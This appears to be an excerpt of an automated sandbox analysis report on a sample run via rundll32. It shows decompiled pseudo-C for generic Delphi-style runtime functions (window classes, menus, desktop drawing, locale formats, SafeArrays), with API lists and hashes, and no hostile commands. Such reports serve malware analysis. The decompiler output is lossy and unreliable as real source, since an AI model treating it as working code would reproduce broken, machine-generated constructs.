                          • MulDiv.KERNEL32(8B00F745,?,02814F77), ref: 0282D3BF
                          • MulDiv.KERNEL32(408BF845,?,8B00F745), ref: 0282D3ED
                          • MulDiv.KERNEL32(408BF845,?,8B00F745), ref: 0282D403
                          • MulDiv.KERNEL32(01E88304,?,408BF845), ref: 0282D43B
                          • MulDiv.KERNEL32(8B00F745,?,408BF845), ref: 0282D453
                          • MulDiv.KERNEL32(EBFFFBE9,?,0000001F), ref: 0282D49D
                          • MulDiv.KERNEL32(FC458BEF,?,0000001F), ref: 0282D4C6
                          • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0282D4EC
                            • Part of subcall function 027F7778: MulDiv.KERNEL32(00000000,?,00000048), ref: 027F7785
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e352711abd8c07a043cd20a822ff16f839b3cc5dbccdad5cc756ad3b54be084
                          • Instruction ID: 0db7a18040777ea598774942daefe960643cc0aed3149412049ac8dcd65408b3
                          • Opcode Fuzzy Hash: 3e352711abd8c07a043cd20a822ff16f839b3cc5dbccdad5cc756ad3b54be084
                          • Instruction Fuzzy Hash: 85515FB86083646FC325DF68C544B6ABBFDAF49204F088C1DA9D9C7351D735E889CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281D0B8 Relevance: 13.6, APIs: 9, Instructions: 146windowregistryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E0281D0B8(intOrPtr __eax, void* __ecx) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				struct _WNDCLASSA _v52;
				char _v56;
				char* _t41;
				CHAR* _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				signed int _t52;
				intOrPtr* _t53;
				signed int _t56;
				struct HINSTANCE__* _t57;
				void* _t60;
				CHAR* _t61;
				char* _t72;
				char* _t80;
				struct HINSTANCE__* _t93;
				intOrPtr _t95;
				intOrPtr _t105;
				void* _t113;
				short _t118;

				_v56 = 0;
				_v8 = __eax;
				_push(_t113);
				_push(0x281d288);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xffffffcc;
				if( *((char*)(_v8 + 0xa4)) != 0) {
					L13:
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x281d28f);
					return E027D40E8( &_v56);
				}
				_t41 =  *0x286465c; // 0x286504c
				if( *_t41 != 0) {
					goto L13;
				}
				 *(_v8 + 0x40) = E027F48F8(E0281D794, _v8);
				 *0x2863d80 = L027D6A3C;
				_t46 =  *0x2863da0; // 0x281ccf8
				_t47 =  *0x2865668; // 0x27d0000
				if(GetClassInfoA(_t47, _t46,  &_v52) == 0) {
					_t93 =  *0x2865668; // 0x27d0000
					 *0x2863d8c = _t93;
					_t118 = RegisterClassA(0x2863d7c);
					if(_t118 == 0) {
						_t95 =  *0x2864364; // 0x27f53dc
						E027D6018(_t95,  &_v56);
						E027DBBC4(_v56, 1);
						E027D3A9C();
					}
				}
				_t49 =  *0x2864444; // 0x2865890
				_t52 =  *((intOrPtr*)( *_t49))(0) >> 1;
				if(_t118 < 0) {
					asm("adc eax, 0x0");
				}
				_t53 =  *0x2864444; // 0x2865890
				_t56 =  *((intOrPtr*)( *_t53))(1, _t52) >> 1;
				if(_t118 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t56);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t57 =  *0x2865668; // 0x27d0000
				_push(_t57);
				_push(0);
				_t60 = E027D45A8( *((intOrPtr*)(_v8 + 0x8c)));
				_t61 =  *0x2863da0; // 0x281ccf8
				 *(_v8 + 0x30) = E027D7024(_t61, _t60);
				E027D40E8(_v8 + 0x8c);
				 *((char*)(_v8 + 0xa4)) = 1;
				SetWindowLongA( *(_v8 + 0x30), 0xfffffffc,  *(_v8 + 0x40));
				_t72 =  *0x28644d4; // 0x2865b98
				if( *_t72 != 0) {
					SendMessageA( *(_v8 + 0x30), 0x80, 1, E0281DED8(_v8));
					SetClassLongA( *(_v8 + 0x30), 0xfffffff2, E0281DED8(_v8));
				}
				_v12 = GetSystemMenu( *(_v8 + 0x30), 0);
				DeleteMenu(_v12, 0xf030, 0);
				DeleteMenu(_v12, 0xf000, 0);
				_t80 =  *0x28644d4; // 0x2865b98
				if( *_t80 != 0) {
					DeleteMenu(_v12, 0xf010, 0);
				}
				goto L13;
			}
























                          0x0281d0c0
                          0x0281d0c3
                          0x0281d0c8
                          0x0281d0c9
                          0x0281d0ce
                          0x0281d0d1
                          0x0281d0de
                          0x0281d272
                          0x0281d274
                          0x0281d277
                          0x0281d27a
                          0x0281d287
                          0x0281d287
                          0x0281d0e4
                          0x0281d0ec
                          0x00000000
                          0x00000000
                          0x0281d103
                          0x0281d10b
                          0x0281d114
                          0x0281d11a
                          0x0281d127
                          0x0281d129
                          0x0281d12e
                          0x0281d13d
                          0x0281d140
                          0x0281d145
                          0x0281d14a
                          0x0281d159
                          0x0281d15e
                          0x0281d15e
                          0x0281d140
                          0x0281d165
                          0x0281d16e
                          0x0281d170
                          0x0281d172
                          0x0281d172
                          0x0281d178
                          0x0281d181
                          0x0281d183
                          0x0281d185
                          0x0281d185
                          0x0281d188
                          0x0281d189
                          0x0281d18b
                          0x0281d18d
                          0x0281d18f
                          0x0281d191
                          0x0281d196
                          0x0281d197
                          0x0281d1a2
                          0x0281d1ae
                          0x0281d1bb
                          0x0281d1c6
                          0x0281d1ce
                          0x0281d1e5
                          0x0281d1ea
                          0x0281d1f2
                          0x0281d20b
                          0x0281d222
                          0x0281d222
                          0x0281d235
                          0x0281d243
                          0x0281d253
                          0x0281d258
                          0x0281d260
                          0x0281d26d
                          0x0281d26d
                          0x00000000

                          APIs
                            • Part of subcall function 027F48F8: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 027F4916
                          • GetClassInfoA.USER32(027D0000,0281CCF8,?), ref: 0281D120
                          • RegisterClassA.USER32(02863D7C), ref: 0281D138
                            • Part of subcall function 027D6018: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 027D6049
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0281D1E5
                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0281D20B
                          • SetClassLongA.USER32(?,000000F2,00000000), ref: 0281D222
                          • GetSystemMenu.USER32(?,00000000,?,000000FC,?), ref: 0281D230
                          • DeleteMenu.USER32(?,0000F030,00000000,?,00000000,?,000000FC,?), ref: 0281D243
                          • DeleteMenu.USER32(?,0000F000,00000000,?,0000F030,00000000,?,00000000,?,000000FC,?), ref: 0281D253
                          • DeleteMenu.USER32(?,0000F010,00000000,?,0000F000,00000000,?,0000F030,00000000,?,00000000,?,000000FC,?), ref: 0281D26D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                          • String ID:
                          • API String ID: 2103932818-0
                          • Opcode ID: 2d1a90876ea1c369594e8231a8cfe8f61a928cb8be537c54780cb47be84e3a7e
                          • Instruction ID: bca2fb57b5f0543760fa2d401b9c953e2eb32e1e89b91ac4d22555bfd06e2b04
                          • Opcode Fuzzy Hash: 2d1a90876ea1c369594e8231a8cfe8f61a928cb8be537c54780cb47be84e3a7e
                          • Instruction Fuzzy Hash: 9B512679A40204AFEB11EBA8ED89FAE77FAEB09700F544490F504EB2D1C775AE00CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282E244 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E0282E244(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _t76;
				intOrPtr _t82;
				int _t85;
				void* _t90;
				int _t91;
				void* _t94;
				void* _t95;
				intOrPtr _t96;

				_t94 = _t95;
				_t96 = _t95 + 0xffffffe0;
				_v5 = __ecx;
				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				}
				_v12 = GetDesktopWindow();
				_v16 = GetDCEx(_v12, 0, 0x402);
				_push(_t94);
				_push(0x282e35f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96;
				_v20 = SelectObject(_v16, E027F7CD8( *((intOrPtr*)(_t90 + 0x40))));
				_t91 = _v36;
				_t85 = _v32;
				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(0x282e366);
				return ReleaseDC(_v12, _v16);
			}



















                          0x0282e245
                          0x0282e247
                          0x0282e24d
                          0x0282e259
                          0x0282e25f
                          0x0282e26f
                          0x0282e276
                          0x0282e277
                          0x0282e278
                          0x0282e279
                          0x0282e27a
                          0x0282e261
                          0x0282e261
                          0x0282e268
                          0x0282e269
                          0x0282e26a
                          0x0282e26b
                          0x0282e26c
                          0x0282e26c
                          0x0282e280
                          0x0282e293
                          0x0282e298
                          0x0282e299
                          0x0282e29e
                          0x0282e2a1
                          0x0282e2b6
                          0x0282e2c2
                          0x0282e2ca
                          0x0282e2d7
                          0x0282e2f9
                          0x0282e318
                          0x0282e332
                          0x0282e33f
                          0x0282e346
                          0x0282e349
                          0x0282e34c
                          0x0282e35e

                          APIs
                          • GetDesktopWindow.USER32 ref: 0282E27B
                          • GetDCEx.USER32(?,00000000,00000402), ref: 0282E28E
                          • SelectObject.GDI32(?,00000000), ref: 0282E2B1
                          • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0282E2D7
                          • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0282E2F9
                          • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0282E318
                          • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0282E332
                          • SelectObject.GDI32(?,?), ref: 0282E33F
                          • ReleaseDC.USER32(?,?), ref: 0282E359
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSelect$DesktopReleaseWindow
                          • String ID:
                          • API String ID: 1187665388-0
                          • Opcode ID: 474ea32535d7d1d7a434a3ba660b88ccb62c18465727bb3cb7b623c4c8c7893a
                          • Instruction ID: 5545ae8028d7359f2efb5a9df72e9dbb5ea0a7cb88b34d4cc54ee11561bc9f3c
                          • Opcode Fuzzy Hash: 474ea32535d7d1d7a434a3ba660b88ccb62c18465727bb3cb7b623c4c8c7893a
                          • Instruction Fuzzy Hash: 573116BAA00219AFDB41DEEDDD89DAFBBBDEF09704B404464B518F7240C675AD048BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DCCA4 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E027DCCA4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x27dcf6f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E027DCB30();
				E027DB4B8(__ebx, __edi, __esi);
				_t196 =  *0x2865754;
				if( *0x2865754 != 0) {
					E027DB690(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E027DB408(_t43, 0, 0x14,  &_v20);
				E027D413C(0x2865688, _v20);
				E027DB408(_t43, 0x27dcf84, 0x1b,  &_v24);
				 *0x286568c = E027D8620(0x27dcf84, 0, _t196);
				E027DB408(_t132, 0x27dcf84, 0x1c,  &_v28);
				 *0x286568d = E027D8620(0x27dcf84, 0, _t196);
				 *0x286568e = E027DB454(_t132, 0x2c, 0xf);
				 *0x286568f = E027DB454(_t132, 0x2e, 0xe);
				E027DB408(_t132, 0x27dcf84, 0x19,  &_v32);
				 *0x2865690 = E027D8620(0x27dcf84, 0, _t196);
				 *0x2865691 = E027DB454(_t132, 0x2f, 0x1d);
				E027DB408(_t132, "m/d/yy", 0x1f,  &_v40);
				E027DB740(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E027D413C(0x2865694, _v36);
				E027DB408(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E027DB740(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E027D413C(0x2865698, _v44);
				 *0x286569c = E027DB454(_t132, 0x3a, 0x1e);
				E027DB408(_t132, 0x27dcfb8, 0x28,  &_v52);
				E027D413C(0x28656a0, _v52);
				E027DB408(_t132, 0x27dcfc4, 0x29,  &_v56);
				E027D413C(0x28656a4, _v56);
				E027D40E8( &_v12);
				E027D40E8( &_v16);
				E027DB408(_t132, 0x27dcf84, 0x25,  &_v60);
				_t104 = E027D8620(0x27dcf84, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E027D4180( &_v8, 0x27dcfdc);
				} else {
					E027D4180( &_v8, 0x27dcfd0);
				}
				E027DB408(_t132, 0x27dcf84, 0x23,  &_v64);
				_t111 = E027D8620(0x27dcf84, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E027DB408(_t132, 0x27dcf84, 0x1005,  &_v68);
					if(E027D8620(0x27dcf84, 0, _t198) != 0) {
						E027D4180( &_v12, 0x27dcff8);
					} else {
						E027D4180( &_v16, 0x27dcfe8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E027D4468();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E027D4468();
				 *0x2865756 = E027DB454(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E027DCF76);
				return E027D410C( &_v68, 0x10);
			}

























                          0x027dcca4
                          0x027dcca4
                          0x027dcca5
                          0x027dcca7
                          0x027dccac
                          0x027dccac
                          0x027dccae
                          0x027dccb0
                          0x027dccb0
                          0x027dccb3
                          0x027dccb6
                          0x027dccb7
                          0x027dccbc
                          0x027dccbf
                          0x027dccc2
                          0x027dccc7
                          0x027dcccc
                          0x027dccd3
                          0x027dccd5
                          0x027dccd5
                          0x027dccdf
                          0x027dccee
                          0x027dccfb
                          0x027dcd10
                          0x027dcd1f
                          0x027dcd34
                          0x027dcd43
                          0x027dcd56
                          0x027dcd69
                          0x027dcd7e
                          0x027dcd8d
                          0x027dcda0
                          0x027dcdb5
                          0x027dcdc0
                          0x027dcdcd
                          0x027dcde2
                          0x027dcded
                          0x027dcdfa
                          0x027dce0d
                          0x027dce22
                          0x027dce2f
                          0x027dce44
                          0x027dce51
                          0x027dce59
                          0x027dce61
                          0x027dce76
                          0x027dce80
                          0x027dce85
                          0x027dce87
                          0x027dcea0
                          0x027dce89
                          0x027dce91
                          0x027dce91
                          0x027dceb5
                          0x027dcebf
                          0x027dcec4
                          0x027dcec6
                          0x027dced8
                          0x027dcee9
                          0x027dcf02
                          0x027dceeb
                          0x027dcef3
                          0x027dcef3
                          0x027dcee9
                          0x027dcf07
                          0x027dcf0a
                          0x027dcf0d
                          0x027dcf12
                          0x027dcf1f
                          0x027dcf24
                          0x027dcf27
                          0x027dcf2a
                          0x027dcf2f
                          0x027dcf3c
                          0x027dcf4f
                          0x027dcf56
                          0x027dcf59
                          0x027dcf5c
                          0x027dcf6e

                          APIs
                          • GetThreadLocale.KERNEL32(00000000,027DCF6F,?,?,00000000,00000000), ref: 027DCCDA
                            • Part of subcall function 027DB408: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                          • API String ID: 4232894706-2493093252
                          • Opcode ID: bba0d13665116302f0e5a7a51ab6fa2c6c301f5472861aa76bcfb2536ed6ef92
                          • Instruction ID: 3aafc00f111eed40fd90dbb6361a6f7497f44f02e9d3b167fbf0f9bb2e8102a9
                          • Opcode Fuzzy Hash: bba0d13665116302f0e5a7a51ab6fa2c6c301f5472861aa76bcfb2536ed6ef92
                          • Instruction Fuzzy Hash: 2F616F35B001489BDB02EBA4D8987DF77B79B99304F91A47AE101FB245DA38D90ACF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DF5E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E027DF5E0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E027DF188(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L027DDCE4();
					return E027DF188(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L027DE140();
						_t113 = _t54;
						if(_t113 == 0) {
							E027DEEE0(_t100);
						}
						E027DF538(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E027DF554(_v788 - 1, _t115) != 0) {
								L027DE178();
								E027DF188(_v792);
								L027DE178();
								E027DF188( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E027DF584(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L027DE148();
							E027DF188(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L027DE150();
							E027DF188(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                          0x027df5e0
                          0x027df5ec
                          0x027df5f2
                          0x027df5f4
                          0x027df5fe
                          0x027df605
                          0x027df605
                          0x027df60a
                          0x027df618
                          0x027df791
                          0x027df798
                          0x027df799
                          0x00000000
                          0x027df61e
                          0x027df621
                          0x027df633
                          0x027df623
                          0x027df628
                          0x027df628
                          0x027df642
                          0x027df64e
                          0x027df651
                          0x027df6be
                          0x027df6c4
                          0x027df6c5
                          0x027df6cb
                          0x027df6cc
                          0x027df6ce
                          0x027df6d3
                          0x027df6d7
                          0x027df6d9
                          0x027df6d9
                          0x027df6e4
                          0x027df6ef
                          0x027df6fa
                          0x027df703
                          0x027df706
                          0x027df722
                          0x027df729
                          0x027df734
                          0x027df74b
                          0x027df750
                          0x027df764
                          0x027df769
                          0x027df77c
                          0x027df77c
                          0x027df785
                          0x027df708
                          0x027df708
                          0x027df709
                          0x027df70f
                          0x027df715
                          0x027df717
                          0x027df719
                          0x027df71c
                          0x027df71f
                          0x027df71f
                          0x027df722
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027df722
                          0x027df653
                          0x027df653
                          0x027df654
                          0x027df656
                          0x027df65c
                          0x027df65e
                          0x027df66d
                          0x027df66e
                          0x027df678
                          0x027df679
                          0x027df67e
                          0x027df689
                          0x027df68a
                          0x027df694
                          0x027df695
                          0x027df69a
                          0x027df6b5
                          0x027df6b7
                          0x027df6b8
                          0x027df6bb
                          0x027df6bb
                          0x00000000
                          0x027df65c
                          0x027df651

                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DF679
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DF695
                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027DF6CE
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DF74B
                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027DF764
                          • VariantCopy.OLEAUT32(?), ref: 027DF799
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                          • String ID:
                          • API String ID: 351091851-3916222277
                          • Opcode ID: 138f2a22f4273bff633cea87e6df589a38215760418d2264427921555f96d28c
                          • Instruction ID: 8b551b2b3cd4a7d5b9fd3310254429a46a850f8a09527eb18cf61a61c98345d5
                          • Opcode Fuzzy Hash: 138f2a22f4273bff633cea87e6df589a38215760418d2264427921555f96d28c
                          • Instruction Fuzzy Hash: 92510975A0062A9BCB26DF58CC84BD9B3BDAF4C310F4441D5E50AE7611D731AF858F62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02830F34 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E02830F34(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x28310f5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E0282A4C4 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E0282A4C4;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E027DD158(_t94, _t95, _t109, _t111);
						}
					}
					 *0x2863ebc = _t111;
					_t96 =  *_t111;
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E027DD158(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E027D8DD4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E02834260(_t111);
					E0282E93C(_t111, E027F74EC( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E027D3408(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x28310fc);
					return E027D40E8( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x286462c; // 0x27f53ec
						E027D6018(_t86,  &_v196);
						_t95 = _v196;
						E027DBC00(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E027D3A9C();
					} else {
						_t108 =  *0x282964c; // 0x2829698
						if(E027D3398(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E02833F7C(_t94);
					}
					goto L7;
				}
			}




















                          0x02830f34
                          0x02830f34
                          0x02830f3d
                          0x02830f41
                          0x02830f47
                          0x02830f4b
                          0x02830f4c
                          0x02830f51
                          0x02830f54
                          0x02830f5f
                          0x02830f61
                          0x02830f6b
                          0x02830fe0
                          0x02830fe3
                          0x02830ff8
                          0x02831000
                          0x02831002
                          0x02831005
                          0x02831016
                          0x02831020
                          0x02831020
                          0x02831025
                          0x0283102f
                          0x0283103e
                          0x02831040
                          0x02831040
                          0x0283103e
                          0x02831045
                          0x02831053
                          0x02831055
                          0x02831062
                          0x02831064
                          0x02831064
                          0x0283107c
                          0x0283109a
                          0x0283109a
                          0x028310a2
                          0x028310a9
                          0x028310ae
                          0x028310c6
                          0x028310cb
                          0x028310cf
                          0x028310d7
                          0x028310d7
                          0x028310de
                          0x028310e1
                          0x028310e4
                          0x028310f4
                          0x02830f76
                          0x02830f76
                          0x02830f7b
                          0x02830fa0
                          0x02830fa3
                          0x02830fa9
                          0x02830fbf
                          0x02830fc4
                          0x02830fc9
                          0x02830fd6
                          0x02830fdb
                          0x02830f83
                          0x02830f85
                          0x02830f92
                          0x00000000
                          0x00000000
                          0x02830f9b
                          0x02830f9b
                          0x00000000
